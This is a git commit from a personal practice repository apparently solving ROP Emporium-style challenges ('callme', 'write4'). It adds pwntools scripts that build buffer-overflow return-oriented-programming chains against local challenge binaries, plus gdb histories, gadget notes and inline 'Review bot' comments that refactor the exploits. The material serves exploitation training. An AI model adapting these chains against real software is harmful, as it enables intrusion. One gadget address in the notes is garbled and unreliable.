authorBrett Weiland <brett_weiland@bpcspace.com>2020-12-16 17:45:09 -0600
committerBrett Weiland <brett_weiland@bpcspace.com>2020-12-16 17:45:09 -0600
commit3f0a1e64c7e7b410ad5f4e2024cd692536389449 (patch)
tree6474bed612527dd0ca7bc9d2f7096769fd212d14
parent2ddedfeb9199c2ff01b540edf92a4f7d69455c16 (diff)
new file: x86_64/write4/exploit.py
new file: x86_64/write4/useful_gadgets
-rw-r--r--x86_64/callme/.gdb_history12
-rwxr-xr-xx86_64/callme/exploit2.py55
-rw-r--r--x86_64/write4/.exploit.py.swpbin0 -> 12288 bytes
-rw-r--r--x86_64/write4/.gdb_history197
-rw-r--r--x86_64/write4/.useful_gadgets.swpbin0 -> 12288 bytes
-rwxr-xr-xx86_64/write4/exploit.py19
-rw-r--r--x86_64/write4/stest2
-rw-r--r--x86_64/write4/useful_gadgets19
8 files changed, 304 insertions, 0 deletions
diff --git a/x86_64/callme/.gdb_history b/x86_64/callme/.gdb_history
new file mode 100644
index 0000000..451f131
--- /dev/null
+++ b/x86_64/callme/.gdb_history
@@ -0,0 +1,12 @@
+break pwnme
+run
+stepi
+return
+stepi
+nexti
+nexti
+q
+break pwnme
+run
+nexti
+quit
diff --git a/x86_64/callme/exploit2.py b/x86_64/callme/exploit2.py
new file mode 100755
index 0000000..b6d228f
--- /dev/null
+++ b/x86_64/callme/exploit2.py
@@ -0,0 +1,55 @@
+#!/usr/bin/env python3
+from pwn import *
+
+usefulGadgets = p64(0x000000000040093c)
+# pop rdi
+# pop rsi
+# pop rdx
+# ret
+
+arg1 = p64(0xdeadbeefdeadbeef)
+arg2 = p64(0xcafebabecafebabe)
+arg3 = p64(0xd00df00dd00df00d)
+
+callme_1_plt = p64(0x0000000000400720)
+callme_2_plt = p64(0x0000000000400740)
+callme_3_plt = p64(0x00000000004006f0)
+
+#jmp qword ptr [rbp]
+#jmp rax
+#jmp qword ptr [rax]
+#pop rbp ; ret
+
+#pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret <- change stack pointer to fin (or some other writable executable part)
+
+
+prog = process('./callme')
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_1_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_2_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_3_plt
+
+
+
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
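Review bot: `print(str(prog.recv(), 'UTF-8'))` on the last line raises UnicodeDecodeError as soon as the child emits a non-UTF-8 byte (the binary payload may be echoed back), so decode leniently: `print(prog.recv().decode('utf-8', errors='replace'))`. The same line appears in the write4 exploit.py hunk further down. The padding loop `for c in range(40): payload += b'a'` with its unused index is just `payload = b'a' * 40`, and the three identical gadget/argument/PLT chains are copy-pasted, so a small helper would make the chain structure visible and keep the three calls consistent. Unlike exploit.py, this script never calls `prog.close()`, leaving the child process and its pipes to interpreter teardown.
```python
# … unchanged: shebang, pwn import, gadget/argument/PLT constants and comments …

def call_with_args(plt: bytes) -> bytes:
    """One pop rdi/rsi/rdx gadget, the three arguments, then a PLT entry."""
    return usefulGadgets + arg1 + arg2 + arg3 + plt

prog = process('./callme')
payload = b'a' * 40  # 40 bytes of padding before the chain
payload += call_with_args(callme_1_plt)
payload += call_with_args(callme_2_plt)
payload += call_with_args(callme_3_plt)
payload += b"\n"
prog.sendline(payload)
sleep(1)
print(prog.recv().decode('utf-8', errors='replace'))
prog.close()
```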
diff --git a/x86_64/write4/.exploit.py.swp b/x86_64/write4/.exploit.py.swp
new file mode 100644
index 0000000..5602feb
--- /dev/null
+++ b/x86_64/write4/.exploit.py.swp
Binary files differ
diff --git a/x86_64/write4/.gdb_history b/x86_64/write4/.gdb_history
new file mode 100644
index 0000000..75b327b
--- /dev/null
+++ b/x86_64/write4/.gdb_history
@@ -0,0 +1,197 @@
+run < stest
+exit
+quit
+break pwnme
+run
+context
+nexti
+quit
+exit
+quit
+quit
+continue
+nexti
+break pwnme+133
+break *pwnme+133
+nexti
+nexti
+nexti
+exit
+quit
+quit
+continue
+quit
+continue
+q
+continue
+quit
+continue
+context
+nexti
+quit
+q
+nexti
+continue
+nexti
+nexti
+stepi
+info reg
+context
+stepi
+exit
+quit
+quit
+exit
+quit
+quit
+exit
+quit
+quit
+quit
+continue
+info reg
+q
+continue
+context
+stepi
+stepi
+continue
+context
+continue
+quit
+continue
+context
+continue
+nexti
+stepi
+quit
+continue
+context
+stepi
+return
+stepi
+ret
+return
+continue
+quit
+continue
+break print_file
+continue
+break print_file
+continue
+stepi
+nexti
+info reg
+context
+print errno
+stepi
+nexti
+continue
+q
+continue
+context
+stepi
+info reg
+context
+nexti
+info reg
+q
+continue
+context
+q
+continue
+context
+continue
+stepi
+return
+context
+nexti
+stepi
+continue
+q
+continue
+quit
+continue
+continue
+nexti
+quit
+quit
+continue
+context
+stepi
+info reg
+context
+q
+continue
+continue
+q
+continue
+context
+continue
+quit
+continue
+context
+continue
+nexti
+stepi
+info reg r14
+stepi
+info reg r14
+stepi
+info reg r15
+stepi
+quit
+cotinue
+continue
+context
+continue
+continue
+q
+run
+continue
+context
+continue
+continue
+q
+continue
+nexti
+stepi
+info reg r14
+info reg r15
+x/x $r14
+stepi
+x/x $r14
+stepi
+x/x $r14
+stepi
+quit
+continue
+stepi
+return
+nexti
+stepi
+quit
+continue
+nexti
+nexti
+stepi
+continue
+quit
+stepi
+continue
+stepi
+nexti
+print .init_array
+x 0x0000000000600df0 + 0x00000df0
+x/s 0x0000000000600df0 + 0x00000df0
+quit
+continue
+stepi
+info reg
+q
+continue
+stepi
+stepi
+stepi
+stepi
+quit
diff --git a/x86_64/write4/.useful_gadgets.swp b/x86_64/write4/.useful_gadgets.swp
new file mode 100644
index 0000000..f89dc3e
--- /dev/null
+++ b/x86_64/write4/.useful_gadgets.swp
Binary files differ
diff --git a/x86_64/write4/exploit.py b/x86_64/write4/exploit.py
new file mode 100755
index 0000000..f8b294e
--- /dev/null
+++ b/x86_64/write4/exploit.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python3
+from pwn import *
+
+prog = process('./write4')
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload += p64(0x0000000000400690) # pop r14, pop r15, ret
+payload += p64(0x0000000000600df0 + 0x00000df0) # addr of init_array section
+payload += b"flag.txt" # our string (duh)
+payload += p64(0x0000000000400628) # mov qword ptr [r14], r15 ; ret
+payload += p64(0x0000000000400693) # pop rdi; ret
+payload += p64(0x0000000000600df0 + 0x00000df0) # addr of init_array section
+payload += p64(0x0000000000400510) # print_file@plt
+payload += b"\n"
+prog.sendline(payload)
+print(str(prog.recv(), 'UTF-8'))
+prog.close()
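Review bot: The write target `0x0000000000600df0 + 0x00000df0` is spelled out twice (the pop r15 value and the pop rdi value) and disagrees with the accompanying useful_gadgets notes, which list `0x0000000000600df0 : addr of init array` with no offset; whichever is correct, bind it once, e.g. `write_addr = 0x0000000000600df0 + 0x00000df0  # TODO confirm against the section headers`, and use `p64(write_addr)` in both places. The notes file also has a garbled gadget line `0x000000000040069) : pop rdi; ret` where the script uses `0x0000000000400693`, so the two should be reconciled. The comment on `b"flag.txt"` should state the constraint the chain depends on: the literal must be exactly 8 bytes because the following `mov qword ptr [r14], r15` writes one qword and no terminator, and a shorter literal would shift every subsequent qword in the payload. Separately, the `.exploit.py.swp`, `.useful_gadgets.swp` and both `.gdb_history` files in this commit are editor/debugger scratch and belong in `.gitignore` rather than the repository.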
diff --git a/x86_64/write4/stest b/x86_64/write4/stest
new file mode 100644
index 0000000..1b35584
--- /dev/null
+++ b/x86_64/write4/stest
@@ -0,0 +1,2 @@
+
+  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcd \ No newline at end of file
diff --git a/x86_64/write4/useful_gadgets b/x86_64/write4/useful_gadgets
new file mode 100644
index 0000000..09c0849
--- /dev/null
+++ b/x86_64/write4/useful_gadgets
@@ -0,0 +1,19 @@
+0x000000000040068d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
+
+0x0000000000400690 : pop r14 ; pop r15 ; ret
+0x0000000000400628 : mov qword ptr [r14], r15 ; ret
+
+0x000000000040069) : pop rdi; ret
+
+
+
+
+
+0x0000000000400510 : print_file@plt
+0x0000000000600df0 : addr of init array
+
+we should write to .init_array .fini_array
+
+
+
+